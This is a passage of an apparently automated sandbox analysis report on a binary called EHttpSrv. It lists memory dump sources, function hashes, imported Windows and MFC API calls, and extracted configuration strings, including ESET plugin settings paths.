                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$free$malloc$memcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 236868670-0
                                                                                                                • Opcode ID: 36469199be2fc4294bb0f29db453580350ffecaf771399cc54a00d94b3cd08aa
                                                                                                                • Instruction ID: 5a313df643740f4e31eff7ce4a5d45c12dc0293d2de4af8accc6272d7ce1a5ed
                                                                                                                • Opcode Fuzzy Hash: 36469199be2fc4294bb0f29db453580350ffecaf771399cc54a00d94b3cd08aa
                                                                                                                • Instruction Fuzzy Hash: 50914A71644306AFD300DFA5C884B6BB7E8BF88704F14891EF59987341E778E969CB92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free$_wcsicmp$realloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2732086526-0
                                                                                                                • Opcode ID: c31a5d5e8833dbd2c4ad275c96db9c2fd158b6a8639ebb0e1260efbe0684881c
                                                                                                                • Instruction ID: 510f4b816378c81cdf23e68cf9a9b2965e75cf173a2ffd1b7ce18075a4390d9e
                                                                                                                • Opcode Fuzzy Hash: c31a5d5e8833dbd2c4ad275c96db9c2fd158b6a8639ebb0e1260efbe0684881c
                                                                                                                • Instruction Fuzzy Hash: F28180B55083859BD304DF95C980B2BBBE9BF84714F048A3DFD9593390E7B9E9048B92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4026$#314#6751
                                                                                                                • String ID:
                                                                                                                • API String ID: 624441723-0
                                                                                                                • Opcode ID: 7639eca9ec8cf7fa67a00069b6f69e1fb63530fbf32c397b7fdbab8c2ed0f492
                                                                                                                • Instruction ID: a9490e028f835bd30253005466e77ed39ab977ce8c7d87d1f14cffa540b6269b
                                                                                                                • Opcode Fuzzy Hash: 7639eca9ec8cf7fa67a00069b6f69e1fb63530fbf32c397b7fdbab8c2ed0f492
                                                                                                                • Instruction Fuzzy Hash: F161E571A48B42AFD318CF68C884B9AF7E1FB84314F10C62DE55647790DB39E909DB52
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22,?,00000000,?,76945540), ref: 204616D6
                                                                                                                • #578.MFC80U ref: 20461721
                                                                                                                • wcsncmp.MSVCR80 ref: 20461769
                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 2046179F
                                                                                                                • #1079.MFC80U(?,000000FF,?,?,?,?,76945540), ref: 204617E2
                                                                                                                • DestroyCursor.USER32(?), ref: 204617FB
                                                                                                                • #1176.MFC80U(?,00000000,?,76945540), ref: 20461803
                                                                                                                • #776.MFC80U(?,?,00000000,?,76945540), ref: 20461819
                                                                                                                • #3873.MFC80U(00000003,00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,76945540), ref: 20461837
                                                                                                                • #5862.MFC80U(00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 2046185E
                                                                                                                • #5742.MFC80U(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000003,00000000,?,00000000,00000000,00000000), ref: 20461888
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1079#1176#310#3873#5742#578#5862#776CursorDestroyMetricsSystemwcsncmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 3476607945-0
                                                                                                                • Opcode ID: c3c9437011b63458bf720ad2ca5c69a012f88d62e895b64de5979d9264fff577
                                                                                                                • Instruction ID: c609bfa9d73d1ddc3338c9e3a7b4b4835114118346bc65253926fe962d1c947b
                                                                                                                • Opcode Fuzzy Hash: c3c9437011b63458bf720ad2ca5c69a012f88d62e895b64de5979d9264fff577
                                                                                                                • Instruction Fuzzy Hash: 2751BF716042009FD320DFA8CC89FAA77E4FB84B05F15852DF50A9B2E1EB78AC04CB91
                                                                                                                APIs
                                                                                                                • CopyRect.USER32(?,?), ref: 2042FCE3
                                                                                                                • GetSysColor.USER32(00000010), ref: 2042FD0A
                                                                                                                • #502.MFC80U(00000000,00000001,00000000,?,?,?,?), ref: 2042FD19
                                                                                                                • #5638.MFC80U(?), ref: 2042FD2D
                                                                                                                • #4117.MFC80U(?,?,?,?), ref: 2042FD3B
                                                                                                                • #3995.MFC80U(?,?,?,?,?,?), ref: 2042FD46
                                                                                                                • GetSysColor.USER32(00000014), ref: 2042FD55
                                                                                                                • #502.MFC80U(00000000,00000001,00000000), ref: 2042FD64
                                                                                                                • #5638.MFC80U(?,00000000,00000001,00000000), ref: 2042FD75
                                                                                                                • #4117.MFC80U(?,?,?,?,00000000,00000001,00000000), ref: 2042FD83
                                                                                                                • #3995.MFC80U(00000001,?,?,?,?,?,00000000,00000001,00000000), ref: 2042FD90
                                                                                                                  • Part of subcall function 20414A70: #1925.MFC80U(FEEA6C22,?,?,?,00000000,2047B9E9,000000FF), ref: 20414AB9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #3995#4117#502#5638Color$#1925CopyRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 808909417-0
                                                                                                                • Opcode ID: d5369b7e757a126f934308db32a224220a0138f8980baaedaffd951340689f7c
                                                                                                                • Instruction ID: e14f29e5b98e428c45963c121036ff52c7d2d09c527758921efcaa37d713eb00
                                                                                                                • Opcode Fuzzy Hash: d5369b7e757a126f934308db32a224220a0138f8980baaedaffd951340689f7c
                                                                                                                • Instruction Fuzzy Hash: EE316271148380AFC300DF94C841BAFBBE8FB98B58F008A1DF545976A0DBB99908C752
                                                                                                                APIs
                                                                                                                • #4574.MFC80U(?,?,?,00000000,00000000,FEEA6C22), ref: 2042C5B9
                                                                                                                • GetWindowRect.USER32(?,?), ref: 2042C5C7
                                                                                                                • #6063.MFC80U(?,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C5E7
                                                                                                                • SendMessageW.USER32(?,00000401,00000001,00000000), ref: 2042C61C
                                                                                                                • GetNextDlgTabItem.USER32(?,00000000,00000000), ref: 2042C630
                                                                                                                • #2366.MFC80U(00000000,?,00000000,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C633
                                                                                                                • #2648.MFC80U(00000000,?,00000000,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C642
                                                                                                                • #1005.MFC80U(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C65C
                                                                                                                • GetNextDlgTabItem.USER32(?,?,00000000), ref: 2042C66B
                                                                                                                • #2366.MFC80U(00000000,?,00000000,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C66E
                                                                                                                • SetForegroundWindow.USER32(?), ref: 2042C681
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2366ItemNextWindow$#1005#2648#4574#6063ForegroundMessageRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1497975009-0
                                                                                                                • Opcode ID: 268c60eebd982fa3f4b46541aedd3ff19783a7c4c468af2f59a84b9d4125b4fd
                                                                                                                • Instruction ID: 4d4ed609ef2d3e0d73337d0b3a77375e0715c24aa2a2a879cd85335ae41d2d06
                                                                                                                • Opcode Fuzzy Hash: 268c60eebd982fa3f4b46541aedd3ff19783a7c4c468af2f59a84b9d4125b4fd
                                                                                                                • Instruction Fuzzy Hash: 5C219C71740A01AFD6149BB4CC85FAAB3A8BB44A04F00CA18FA1497690DB78F9158BA4
                                                                                                                APIs
                                                                                                                • #6232.MFC80U(00000001,?,2045509B,00000000), ref: 20455205
                                                                                                                • #2651.MFC80U(000004DD,?,00000001,?,2045509B,00000000), ref: 20455218
                                                                                                                • #2155.MFC80U(000004DD,?,00000001,?,2045509B,00000000), ref: 2045521F
                                                                                                                • #2651.MFC80U(00000418,?,000004DD,?,00000001,?,2045509B,00000000), ref: 20455232
                                                                                                                • #2155.MFC80U(00000418,?,000004DD,?,00000001,?,2045509B,00000000), ref: 20455239
                                                                                                                • #2651.MFC80U(00000419,?,00000418,?,000004DD,?,00000001,?,2045509B,00000000), ref: 2045524C
                                                                                                                • #2155.MFC80U(00000419,?,00000418,?,000004DD,?,00000001,?,2045509B,00000000), ref: 20455253
                                                                                                                • #2651.MFC80U(000004DE,00000419,?,00000418,?,000004DD,?,00000001,?,2045509B,00000000), ref: 2045525F
                                                                                                                • #2155.MFC80U(?,000004DE,00000419,?,00000418,?,000004DD,?,00000001,?,2045509B,00000000), ref: 20455271
                                                                                                                • #2651.MFC80U(000004E0,000004DE,00000419,?,00000418,?,000004DD,?,00000001,?,2045509B,00000000), ref: 2045527D
                                                                                                                • #2155.MFC80U(?,000004E0,000004DE,00000419,?,00000418,?,000004DD,?,00000001,?,2045509B,00000000), ref: 2045528F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2155#2651$#6232
                                                                                                                • String ID:
                                                                                                                • API String ID: 793604035-0
                                                                                                                • Opcode ID: 32b24fc6810e55448ecad773b48f44faf7bf5a8371575952047a1bcdeaf18501
                                                                                                                • Instruction ID: d9462817ed0175571ba0e8da9ac5a690567f16914b54dad8b74cc5d71aa63388
                                                                                                                • Opcode Fuzzy Hash: 32b24fc6810e55448ecad773b48f44faf7bf5a8371575952047a1bcdeaf18501
                                                                                                                • Instruction Fuzzy Hash: F6F031703806145BDD1993F05923BFF22AA8BA5F08F80C52C73465FAE0DD7C9D4283A5
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID: DESC$GROUP$GROUPNAME$OPTION_GROUPS
                                                                                                                • API String ID: 441403673-1081468104
                                                                                                                • Opcode ID: 5caa866b5bec255260ff46eacaaadd1735a882438c88b8a4e964155054608e62
                                                                                                                • Instruction ID: 3bf162d876ada341dd8acd80099372fd476f95245a112324419e4c9907aadb9c
                                                                                                                • Opcode Fuzzy Hash: 5caa866b5bec255260ff46eacaaadd1735a882438c88b8a4e964155054608e62
                                                                                                                • Instruction Fuzzy Hash: 817192714083459BC320DFA4CC81F9BF7E8EF94658F408E2DF58992251E739E689CB92
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: swprintf_s
                                                                                                                • String ID: DELETE$NODE;NAME=%s;TYPE=BINARY$NODE;NAME=%s;TYPE=DWORD$NODE;NAME=%s;TYPE=STRING$VALUE$xXH
                                                                                                                • API String ID: 3896565401-115358340
                                                                                                                • Opcode ID: 5c7fc1777b5df919b25d2c8d4360ef07eecc68e31c29cbc3e4a9f56370462f45
                                                                                                                • Instruction ID: eb93d34df94da4c78f8e7e54604ab15d5e5f00135a11c63df88e6c2d678df026
                                                                                                                • Opcode Fuzzy Hash: 5c7fc1777b5df919b25d2c8d4360ef07eecc68e31c29cbc3e4a9f56370462f45
                                                                                                                • Instruction Fuzzy Hash: AB51A1B1640205AFD714DF94CC81BABB3AAFFD8604F10842DFD058B342DA79EE558BA1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20401670: malloc.MSVCR80 ref: 2040169E
                                                                                                                  • Part of subcall function 20401670: malloc.MSVCR80 ref: 204016B0
                                                                                                                  • Part of subcall function 20401670: free.MSVCR80 ref: 204016BD
                                                                                                                • malloc.MSVCR80 ref: 2044183E
                                                                                                                • free.MSVCR80 ref: 2044188C
                                                                                                                • #1176.MFC80U(?,FEEA6CBE,-00003AB4,00000000), ref: 204418AC
                                                                                                                • free.MSVCR80 ref: 204418B6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: freemalloc$#1176
                                                                                                                • String ID: <?xml version="1.0" encoding="utf-8"?>$<?xml version="1.0"?>$REMOVED$RULE$ZONE
                                                                                                                • API String ID: 4268895495-836254500
                                                                                                                • Opcode ID: e7cd42a809f30050df726940a87ca4e810be6a939bacf1d33c9071cf72ae487f
                                                                                                                • Instruction ID: 9f0b7d97f9eb5a94f0670fd3c6cc8665c0975a643be5f1e627de16da5e0c2e04
                                                                                                                • Opcode Fuzzy Hash: e7cd42a809f30050df726940a87ca4e810be6a939bacf1d33c9071cf72ae487f
                                                                                                                • Instruction Fuzzy Hash: 0951D4B1E007009BE310AF95D881B1BB3E6AF94648F14C93DF949A7361E739ED45C792
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22,?,?,?,00000000,?,?,?,?,?,?,?,00000000,FEEA6C22), ref: 20455DEB
                                                                                                                • #764.MFC80U(?,?), ref: 20455EA1
                                                                                                                • #265.MFC80U(00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,FEEA6C22), ref: 20455EE5
                                                                                                                • wcscpy_s.MSVCR80 ref: 20455F16
                                                                                                                • wcsncpy_s.MSVCR80 ref: 20455F28
                                                                                                                • #764.MFC80U(?,?), ref: 20455F6F
                                                                                                                • #578.MFC80U ref: 20455FA6
                                                                                                                • #1176.MFC80U(?,?,?,00000000,?,?,?,?,?,?,?,00000000,FEEA6C22), ref: 20455FC2
                                                                                                                  • Part of subcall function 20464370: #310.MFC80U(FEEA6C22,?,?,?,?), ref: 204643C1
                                                                                                                  • Part of subcall function 20464370: #310.MFC80U ref: 204643D6
                                                                                                                  • Part of subcall function 20464370: #776.MFC80U(?), ref: 204643F5
                                                                                                                  • Part of subcall function 20464370: #578.MFC80U ref: 20464782
                                                                                                                  • Part of subcall function 20464370: #578.MFC80U ref: 20464797
                                                                                                                  • Part of subcall function 2040E760: #764.MFC80U(000000FF,?,?,2040F2C9,?), ref: 2040E7A2
                                                                                                                  • Part of subcall function 2040E760: #265.MFC80U(00000000,?,?,?,2040F2C9,?), ref: 2040E7E4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#578#764$#265$#1176#776wcscpy_swcsncpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 3470009779-3916222277
                                                                                                                • Opcode ID: c17d74e14d23b0267385888c91c65e9388fc123ff68b39543be46123bcf6997a
                                                                                                                • Instruction ID: b1d30187408b73940ea762bb02ff348248dda659718feac6957b8044c00cc79c
                                                                                                                • Opcode Fuzzy Hash: c17d74e14d23b0267385888c91c65e9388fc123ff68b39543be46123bcf6997a
                                                                                                                • Instruction Fuzzy Hash: 1F519C725082019FC310CF99C895A6BFBF5FF99708F458A2DF58997251D739EA08CB82
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • ${PluginID}=, xrefs: 2043CFFE
                                                                                                                • ESET, xrefs: 2043CFF4
                                                                                                                • SECTION;ID=#01000103\SETTINGS\PLUGINS\PLUGIN;ID=#${PluginID}\PROFILES, xrefs: 2043D093
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_s$wcsncpy_s$LibraryLoad
                                                                                                                • String ID: ${PluginID}=$ESET$SECTION;ID=#01000103\SETTINGS\PLUGINS\PLUGIN;ID=#${PluginID}\PROFILES
                                                                                                                • API String ID: 2742677927-2568907538
                                                                                                                • Opcode ID: 9acdf42161d0a6ae857dca1658d6c8f4ee2def6241f8a4135d57d38e82bec52e
                                                                                                                • Instruction ID: b7d351eab212eaa2f05cd36c50a2d2e81fd49b828b755f13449f4648483a3c71
                                                                                                                • Opcode Fuzzy Hash: 9acdf42161d0a6ae857dca1658d6c8f4ee2def6241f8a4135d57d38e82bec52e
                                                                                                                • Instruction Fuzzy Hash: 4231B0711043016BD224DB94DC86FEBB3A4EF8CB08F408D28FA4597190FAB8E7098786
                                                                                                                APIs
                                                                                                                • #3793.MFC80U(?,?,?), ref: 2043669D
                                                                                                                • #2870.MFC80U(00000000,?,00000001,?,?,?), ref: 204366B9
                                                                                                                • SendMessageW.USER32(?,00001108,00000000,00000000), ref: 204366D1
                                                                                                                • #2364.MFC80U(00000000), ref: 204366D4
                                                                                                                • #1079.MFC80U(?,?,00000000), ref: 204366E6
                                                                                                                  • Part of subcall function 204359A0: #1079.MFC80U(?,FEEA6C22), ref: 204359DB
                                                                                                                  • Part of subcall function 204359A0: #6749.MFC80U(?,?,FEEA6C22), ref: 204359E7
                                                                                                                • SendMessageW.USER32(?,00001108,00000002,00000000), ref: 20436712
                                                                                                                • #2364.MFC80U(00000000), ref: 20436715
                                                                                                                • #1079.MFC80U(?,?,00000000), ref: 20436727
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1079$#2364MessageSend$#2870#3793#6749
                                                                                                                • String ID: F
                                                                                                                • API String ID: 2991566221-1304234792
                                                                                                                • Opcode ID: b0febab9a186303612cc836f932a8f5a4e86fbd80f5503988fade0af5c6a8c80
                                                                                                                • Instruction ID: a57e960a392a3614f539fb0410070a3646e4a01412dfdebd22928052e10d9277
                                                                                                                • Opcode Fuzzy Hash: b0febab9a186303612cc836f932a8f5a4e86fbd80f5503988fade0af5c6a8c80
                                                                                                                • Instruction Fuzzy Hash: BA316BB16043019FD304CF68C985E6AB7E9AFD8728F11C65DF9598B2A1DB74EC04CBA1
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,FEEA6C22,20462D01,?,?,20462D02,00000000,2047F1AF,000000FF,2040F2B9), ref: 2040F50D
                                                                                                                • #764.MFC80U(?,FEEA6C22,20462D01,?,?,20462D02,00000000,2047F1AF,000000FF,2040F2B9), ref: 2040F524
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
